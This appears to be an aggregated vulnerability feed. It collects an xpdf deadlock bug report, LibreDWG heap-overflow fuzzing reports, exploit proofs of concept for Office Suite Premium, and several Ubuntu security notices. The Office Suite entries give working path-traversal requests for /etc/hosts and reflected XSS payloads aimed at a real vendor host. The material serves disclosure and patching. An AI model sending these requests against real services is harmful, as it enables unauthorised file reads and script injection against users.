Xpdf 4.04 will deadlock on a PDF object stream whose "Length" field is itself in another object stream.



The program seems to be stuck waiting for a lock while executing the XRef:: getObject StreamObject function. I am not sure if this is a deadlock issue and if it is an error

version:4.04  
reproduce: pdftotext poc.pdf poc.txt  
My system OS：Ubuntu 22.04  
My Compilation Process：

mkdir build  
cd build  
cmake -DCMAKE\_BUILD\_TYPE=Release ..  
make  
sudo make install  
pdftotext poc.pdf poc.txt

Code: Select all

    Program received signal SIGINT, Interrupt.
    __lll_lock_wait (futex=futex@entry=0x55555578a6a0, private=0)
        at lowlevellock.c:52
    52	lowlevellock.c: 没有那个文件或目录.
    (gdb) bt
    #0  __lll_lock_wait (futex=futex@entry=0x55555578a6a0, private=0)
        at lowlevellock.c:52
    #1  0x00007ffff7f9d0a3 in __GI___pthread_mutex_lock (
        mutex=mutex@entry=0x55555578a6a0) at ../nptl/pthread_mutex_lock.c:80
    #2  0x000055555568d140 in XRef::getObjectStreamObject (
        this=this@entry=0x55555578a020, objStrNum=358, objIdx=5, 
        objNum=objNum@entry=361, obj=obj@entry=0x7fffffffdc60)
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/XRef.cc:1304
    #3  0x000055555568d797 in XRef::fetch (this=0x55555578a020, num=361, gen=0, 
        obj=0x7fffffffdc60, recursion=1)
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/XRef.cc:1266
    #4  0x0000555555672161 in Object::dictLookup (this=0x7fffffffde50, 
        recursion=1, obj=0x7fffffffdc60, key=0x5555556c8d07 "Length")
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/Object.h:267
    #5  Parser::makeStream (this=0x5555557d7170, dict=0x7fffffffde50, fileKey=0x0, 
        encAlgorithm=cryptRC4, keyLength=0, objNum=205, objGen=0, recursion=1)
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/Parser.cc:175
    #6  0x0000555555672a52 in Parser::getObj (this=this@entry=0x5555557d7170, 
        obj=obj@entry=0x7fffffffde50, simpleOnly=simpleOnly@entry=0, fileKey=0x0, 
        encAlgorithm=cryptRC4, keyLength=0, objNum=<optimized out>, 
        objGen=<optimized out>, recursion=<optimized out>)
        at /home/ljh/fuzzing_xpdf/xpdf-4.04/xpdf/Parser.cc:103
    #7  0x000055555568d865 in XRef::fetch (this=0x55555578a020, num=205, gen=0,

Unfortunately, even if the test file is compressed, it still exceeds 600KB. Can you increase the upload file size limit on the forum? Or there are other ways to transfer files to you

CVE-2023-3436: xpdf-4.04/xpdf/XRef.cc: XRef::getObjectStreamObject - forum.xpdfreader.com

Office Suite Premium version 10.9.1.42602 suffers from a local file inclusion vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Local File Inclusion

Office Suite Premium version 10.9.1.42602 suffers from a path traversal vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Path Traversal# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Path Traversal

Office Suite Premium version 10.9.1.42602 suffers from a cross site scripting vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POC# Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.Request 1: GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-codePayload: <img src=a onerror=alert(1)>Parameter : applicationRequest 2 : GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527Payload : <img src=a onerror=alert(1)>Parameter: idRequest 3 : GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=searchPayload :<img src=a onerror=alert(1)>Parameter: filter

Office Suite Premium 10.9.1.42602 Cross Site Scripting

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_wcs2nlen at bits.c.

Hello, I was testing my fuzzer and found two bugs in dwg2SVG.

**environment**

ubuntu 20.04, GCC 9.4.0, libredwg latest commit 9df4ec3

compile with

    ./autogen.sh && ./configure --disable-shared && make -j$(nproc)
    

##BUG1

    ./dwg2SVG ../pocs/poc0.bit_utf8_to_TU
    =================================================================
    ==19712==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000dc at pc 0x5603ca37f05a bp 0x7fff049b1c90 sp 0x7fff049b1c80
    WRITE of size 2 at 0x6020000000dc thread T0
        #0 0x5603ca37f059 in bit_utf8_to_TU /libredwg/src/bits.c:2883
        #1 0x5603cae6faab in dwg_is_valid_tag /libredwg/src/dwg_api.c:22059
        #2 0x5603cae6faab in dwg_is_valid_tag /libredwg/src/dwg_api.c:22048
        #3 0x5603ca7744de in dwg_decode_ATTRIB_private /libredwg/src/dwg.spec:204
        #4 0x5603ca8fe1ec in dwg_decode_ATTRIB /libredwg/src/dwg.spec:187
        #5 0x5603cacaa3a2 in decode_preR13_entities /libredwg/src/decode.c:6520
        #6 0x5603cacf559c in decode_preR13 /libredwg/src/decode_r11.c:719
        #7 0x5603cac76a6a in dwg_decode /libredwg/src/decode.c:217
        #8 0x5603ca362d77 in dwg_read_file /libredwg/src/dwg.c:261
        #9 0x5603ca35857c in main /libredwg/programs/dwg2SVG.c:979
        #10 0x7fc02854f082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
        #11 0x5603ca358c1d in _start (/validate/dwg2SVG/dwg2SVG+0x206c1d)
    
    0x6020000000dc is located 0 bytes to the right of 12-byte region [0x6020000000d0,0x6020000000dc)
    allocated by thread T0 here:
        #0 0x7fc028979a06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153
        #1 0x5603ca37e83a in bit_utf8_to_TU /libredwg/src/bits.c:2856
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /libredwg/src/bits.c:2883 in bit_utf8_to_TU
    Shadow bytes around the buggy address:
      0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00
    =>0x0c047fff8010: fa fa 02 fa fa fa 01 fa fa fa 00[04]fa fa fa fa
      0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==19712==ABORTING
    

##BUG2

    ./dwg2SVG ../pocs/poc1.bit_wcs2nlen
    ==19713==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000097a at pc 0x55781f6dd09d bp 0x7ffc201cb2e0 sp 0x7ffc201cb2d0
    READ of size 2 at 0x60400000097a thread T0
        #0 0x55781f6dd09c in bit_wcs2nlen /libredwg/src/bits.c:1834
        #1 0x5578201d2abb in dwg_is_valid_tag /libredwg/src/dwg_api.c:22060
        #2 0x5578201d2abb in dwg_is_valid_tag /libredwg/src/dwg_api.c:22048
        #3 0x55781fad74de in dwg_decode_ATTRIB_private /libredwg/src/dwg.spec:204
        #4 0x55781fc611ec in dwg_decode_ATTRIB /libredwg/src/dwg.spec:187
        #5 0x55782000d3a2 in decode_preR13_entities /libredwg/src/decode.c:6520
        #6 0x55782005859c in decode_preR13 /libredwg/src/decode_r11.c:719
        #7 0x55781ffd9a6a in dwg_decode /libredwg/src/decode.c:217
        #8 0x55781f6c5d77 in dwg_read_file /libredwg/src/dwg.c:261
        #9 0x55781f6bb57c in main /libredwg/programs/dwg2SVG.c:979
        #10 0x7faa3dcaf082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
        #11 0x55781f6bbc1d in _start (/validate/dwg2SVG/dwg2SVG+0x206c1d)
    
    0x60400000097a is located 0 bytes to the right of 42-byte region [0x604000000950,0x60400000097a)
    allocated by thread T0 here:
        #0 0x7faa3e0d9a06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153
        #1 0x55781f6e183a in bit_utf8_to_TU /libredwg/src/bits.c:2856
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /libredwg/src/bits.c:1834 in bit_wcs2nlen
    Shadow bytes around the buggy address:
      0x0c087fff80d0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff80e0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff80f0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff8100: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
      0x0c087fff8110: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
    =>0x0c087fff8120: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00[02]
      0x0c087fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c087fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==19713==ABORTING
    

**POC**

poc.zip

**Credit**

Han Zheng (Hexhive, NCNIPC of China)

CVE-2023-36271: [FUZZ] two bugs in dwg2SVG · Issue #681 · LibreDWG/libredwg

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_utf8_to_TU at bits.c.

CVE-2023-36272: [FUZZ] two bugs in dwg2SVG · Issue #681 · LibreDWG/libredwg

Ubuntu Security Notice 6161-2 - USN-6161-1 fixed vulnerabilities in .NET. The update introduced a regression with regards to how the runtime imported X.509 certificates. This update fixes the problem. It was discovered that .NET did not properly enforce certain restrictions when deserializing a DataSet or DataTable from XML. An attacker could possibly use this issue to elevate their privileges.

==========================================================================  
Ubuntu Security Notice USN-6161-2  
June 23, 2023

dotnet6, dotnet7 regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

USN 6161-1 introduced a regression in .NET that could incorrectly  
cause X.509 certificate imports to fail when they should succeed.

Software Description:  
- dotnet6: dotNET CLI tools and runtime  
- dotnet7: dotNET CLI tools and runtime

Details:

USN-6161-1 fixed vulnerabilities in .NET. The update introduced  
a regression with regards to how the runtime imported X.509  
certificates. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

  It was discovered that .NET did not properly enforce certain  
  restrictions when deserializing a DataSet or DataTable from  
  XML. An attacker could possibly use this issue to elevate their  
  privileges. (CVE-2023-24936)

  Kevin Jones discovered that .NET did not properly handle the  
  AIA fetching process for X.509 client certificates. An attacker  
  could possibly use this issue to cause a denial of service.  
  (CVE-2023-29331)

  Kalle Niemitalo discovered that the .NET package manager,  
  NuGet, was susceptible to a potential race condition. An  
  attacker could possibly use this issue to perform remote  
  code execution. (CVE-2023-29337)

  Tom Deseyn discovered that .NET did not properly process certain  
  arguments when extracting the contents of a tar file. An attacker  
  could possibly use this issue to elevate their privileges. This  
  issue only affected the dotnet7 package. (CVE-2023-32032)

  It was discovered that .NET did not properly handle memory in  
  certain circumstances. An attacker could possibly use this issue  
  to cause a denial of service or perform remote code execution.  
  (CVE-2023-33128)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:  
Ubuntu 23.04:  
    aspnetcore-runtime-6.0         6.0.118-0ubuntu1~23.04.1  
    aspnetcore-runtime-7.0         7.0.107-0ubuntu1~23.04.1  
    dotnet-host                            6.0.118-0ubuntu1~23.04.1  
    dotnet-host-7.0                      7.0.107-0ubuntu1~23.04.1  
    dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~23.04.1  
    dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~23.04.1  
    dotnet-runtime-6.0                 6.0.118-0ubuntu1~23.04.1  
    dotnet-runtime-7.0                 7.0.107-0ubuntu1~23.04.1  
    dotnet-sdk-6.0                       6.0.118-0ubuntu1~23.04.1  
    dotnet-sdk-7.0                       7.0.107-0ubuntu1~23.04.1  
    dotnet6 6.0.118-0ubuntu1~23.04.1  
    dotnet7 7.0.107-0ubuntu1~23.04.1

Ubuntu 22.10:  
    aspnetcore-runtime-6.0         6.0.118-0ubuntu1~22.10.1  
    aspnetcore-runtime-7.0         7.0.107-0ubuntu1~22.10.1  
    dotnet-host 6.0.118-0ubuntu1~22.10.1  
    dotnet-host-7.0                      7.0.107-0ubuntu1~22.10.1  
    dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~22.10.1  
    dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~22.10.1  
    dotnet-runtime-6.0                 6.0.118-0ubuntu1~22.10.1  
    dotnet-runtime-7.0                 7.0.107-0ubuntu1~22.10.1  
    dotnet-sdk-6.0                       6.0.118-0ubuntu1~22.10.1  
    dotnet-sdk-7.0                       7.0.107-0ubuntu1~22.10.1  
    dotnet6 6.0.118-0ubuntu1~22.10.1  
    dotnet7 7.0.107-0ubuntu1~22.10.1

Ubuntu 22.04 LTS:  
    aspnetcore-runtime-6.0          6.0.118-0ubuntu1~22.04.1  
    aspnetcore-runtime-7.0          7.0.107-0ubuntu1~22.04.1  
    dotnet-host 6.0.118-0ubuntu1~22.04.1  
    dotnet-host-7.0                      7.0.107-0ubuntu1~22.04.1  
    dotnet-hostfxr-6.0                  6.0.118-0ubuntu1~22.04.1  
    dotnet-hostfxr-7.0                  7.0.107-0ubuntu1~22.04.1  
    dotnet-runtime-6.0                 6.0.118-0ubuntu1~22.04.1  
    dotnet-runtime-7.0                 7.0.107-0ubuntu1~22.04.1  
    dotnet-sdk-6.0                       6.0.118-0ubuntu1~22.04.1  
    dotnet-sdk-7.0                       7.0.107-0ubuntu1~22.04.1  
    dotnet6 6.0.118-0ubuntu1~22.04.1  
    dotnet7 7.0.107-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6161-2  
https://ubuntu.com/security/notices/USN-6161-1  
https://launchpad.net/bugs/2024893, https://launchpad.net/bugs/2024894

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.119-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.108-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.119-0ubuntu1~22.10.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.108-0ubuntu1~22.10.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.119-0ubuntu1~22.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.108-0ubuntu1~22.04.1

Ubuntu Security Notice USN-6161-2

Ubuntu Security Notice 6188-1 - Matt Caswell discovered that OpenSSL incorrectly handled certain ASN.1 object identifiers. A remote attacker could possibly use this issue to cause OpenSSL to consume resources, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6188-1  
June 22, 2023

openssl vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

OpenSSL could be made to consume resources and cause long  
delays if it processed certain input.

Software Description:  
- openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

Matt Caswell discovered that OpenSSL incorrectly handled certain ASN.1  
object identifiers. A remote attacker could possibly use this issue to  
cause OpenSSL to consume resources, resulting in a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libssl1.0.0                     1.0.2g-1ubuntu4.20+esm9  
   openssl                         1.0.2g-1ubuntu4.20+esm9

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   libssl1.0.0                     1.0.1f-1ubuntu2.27+esm9  
   openssl                         1.0.1f-1ubuntu2.27+esm9

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6188-1  
   CVE-2023-2650

Ubuntu Security Notice USN-6188-1

Ubuntu Security Notice 6184-1 - It was discovered that CUPS incorrectly handled certain memory operations. An attacker could possibly use this issue to cause CUPS to crash, resulting in a denial of service, or possibly obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6184-1  
June 22, 2023

cups vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

CUPS could be made to crash or expose sensitive information over the  
network.

Software Description:  
- cups: Common UNIX Printing System(tm)

Details:

It was discovered that CUPS incorrectly handled certain memory operations.  
An attacker could possibly use this issue to cause CUPS to crash, resulting  
in a denial of service, or possibly obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   cups                            2.4.2-3ubuntu2.2

Ubuntu 22.10:  
   cups                            2.4.2-1ubuntu2.2

Ubuntu 22.04 LTS:  
   cups                            2.4.1op1-1ubuntu4.4

Ubuntu 20.04 LTS:  
   cups                            2.3.1-9ubuntu1.4

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6184-1  
   CVE-2023-34241

Package Information:  
   https://launchpad.net/ubuntu/+source/cups/2.4.2-3ubuntu2.2  
   https://launchpad.net/ubuntu/+source/cups/2.4.2-1ubuntu2.2  
   https://launchpad.net/ubuntu/+source/cups/2.4.1op1-1ubuntu4.4  
   https://launchpad.net/ubuntu/+source/cups/2.3.1-9ubuntu1.4

Ubuntu Security Notice USN-6184-1

Ubuntu Security Notice 6187-1 - William Zhao discovered that the Traffic Control subsystem in the Linux kernel did not properly handle network packet retransmission in certain situations. A local attacker could use this to cause a denial of service. It was discovered that the TUN/TAP driver in the Linux kernel did not properly initialize socket data. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6187-1  
June 22, 2023

linux-ibm vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-ibm: Linux kernel for IBM cloud systems

Details:

William Zhao discovered that the Traffic Control (TC) subsystem in the  
Linux kernel did not properly handle network packet retransmission in  
certain situations. A local attacker could use this to cause a denial of  
service (kernel deadlock). (CVE-2022-4269)

It was discovered that the TUN/TAP driver in the Linux kernel did not  
properly initialize socket data. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1076)

It was discovered that the Real-Time Scheduling Class implementation in the  
Linux kernel contained a type confusion vulnerability in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-1077)

It was discovered that the ASUS HID driver in the Linux kernel did not  
properly handle device removal, leading to a use-after-free vulnerability.  
A local attacker with physical access could plug in a specially crafted USB  
device to cause a denial of service (system crash). (CVE-2023-1079)

It was discovered that the Xircom PCMCIA network device driver in the Linux  
kernel did not properly handle device removal events. A physically  
proximate attacker could use this to cause a denial of service (system  
crash). (CVE-2023-1670)

It was discovered that a race condition existed in the Xen transport layer  
implementation for the 9P file system protocol in the Linux kernel, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (guest crash) or expose sensitive information (guest  
kernel memory). (CVE-2023-1859)

Jose Oliveira and Rodrigo Branco discovered that the Spectre Variant 2  
mitigations with prctl syscall were insufficient in some situations. A  
local attacker could possibly use this to expose sensitive information.  
(CVE-2023-1998)

It was discovered that the BigBen Interactive Kids' gamepad driver in the  
Linux kernel did not properly handle device removal, leading to a use-  
after-free vulnerability. A local attacker with physical access could plug  
in a specially crafted USB device to cause a denial of service (system  
crash). (CVE-2023-25012)

It was discovered that a use-after-free vulnerability existed in the HFS+  
file system implementation in the Linux kernel. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-2985)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   linux-image-5.19.0-1024-ibm     5.19.0-1024.26  
   linux-image-ibm                 5.19.0.1024.21

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6187-1  
   CVE-2022-4269, CVE-2023-1076, CVE-2023-1077, CVE-2023-1079,  
   CVE-2023-1670, CVE-2023-1859, CVE-2023-1998, CVE-2023-25012,  
   CVE-2023-2985

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-ibm/5.19.0-1024.26

Tag

#ubuntu